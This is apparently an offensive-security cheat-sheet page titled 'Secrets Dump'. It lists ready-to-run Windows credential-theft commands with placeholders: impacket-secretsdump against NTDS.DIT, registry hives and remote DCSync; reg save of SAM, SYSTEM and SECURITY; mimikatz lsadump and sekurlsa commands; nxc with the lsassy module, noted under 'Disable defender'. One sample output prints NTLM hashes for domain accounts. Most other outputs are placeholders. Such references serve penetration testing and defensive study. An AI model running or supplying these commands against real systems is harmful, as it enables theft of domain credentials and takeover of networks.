TLDRBins TLDRBins / Secrets Dump

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Convert NTDS.DIT to .sqlite

ntdsdotsqlite ntds.dit --system SYSTEM -o ntds.sqlite

Sample Output:
TO-DO

Ref: ntdsdotsqlite

With NTDS.DIT and SYSTEM Hive

impacket-secretsdump -ntds ntds.dit -system system LOCAL

Sample Output:
$ impacket-secretsdump -ntds ntds.dit -system system LOCAL
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
---[SNIP]---
[*] Cleaning up...

With SAM, SYSTEM and SECURITY Hives

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

Sample Output:
TO-DO
reg save HKLM\SYSTEM SYSTEM

Sample Output:
TO-DO
reg save HKLM\SECURITY SECURITY

Sample Output:
TO-DO
reg save HKLM\SAM SAM

Sample Output:
TO-DO
.\mimikatz.exe "lsadump::secrets /system:SYSTEM /security:SECURITY"

Sample Output:
TO-DO
.\mimikatz.exe "lsadump::sam /system:SYSTEM /sam:SAM"

Sample Output:
TO-DO
execute "powershell" "reg save HKLM\SYSTEM C:\SYSTEM"

Sample Output:
TO-DO
execute "powershell" "reg save HKLM\SECURITY C:\SECURITY"

Sample Output:
TO-DO
execute "powershell" "reg save HKLM\SAM C:\SAM"

Sample Output:
TO-DO
mimikatz -- '"lsadump::secrets /system:C:\SYSTEM /security:C:\SECURITY"'

Sample Output:
TO-DO
mimikatz -- '"lsadump::sam /system:C:\SYSTEM /sam:C:\SAM"'

Sample Output:
TO-DO

With DCSync Right

# Password
impacket-secretsdump '<USER>:<PASSWORD>@<TARGET>'

Sample Output:
TO-DO
# NTLM
impacket-secretsdump '<DOMAIN>/<USER>@<DC>' -hashes ':<HASH>'

Sample Output:
TO-DO
# Kerberos
impacket-secretsdump -k -no-pass -dc-ip <DC_IP> <DC>

Sample Output:
TO-DO
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H <HASH> --ntds

Sample Output:
TO-DO
.\mimikatz.exe "lsadump::dcsync /all" "exit"

Sample Output:
TO-DO
# Dump old creds
.\mimikatz.exe "lsadump::dcsync /user:<DOMAIN>\<USER> /history" "exit"

Sample Output:
TO-DO
mimikatz -- '"lsadump::dcsync /all"' "exit"

Sample Output:
TO-DO

With SYSTEM / Administrator / LAPS

impacket-secretsdump '<USER>:<PASSWORD>@<TARGET_DOMAIN>'

Sample Output:
TO-DO
# Disable defender
nxc smb <TARGET_DOMAIN> -u 'administrator' -p '<PASSWORD>' --local-auth -M lsassy 

Sample Output:
TO-DO
.\mimikatz.exe "sekurlsa::logonpasswords"

Sample Output:
TO-DO
.\mimikatz.exe "lsadump::lsa /patch"

Sample Output:
TO-DO
mimikatz -- '"sekurlsa::logonpasswords"'

Sample Output:
TO-DO
mimikatz -- '"lsadump::lsa /patch"'

Sample Output:
TO-DO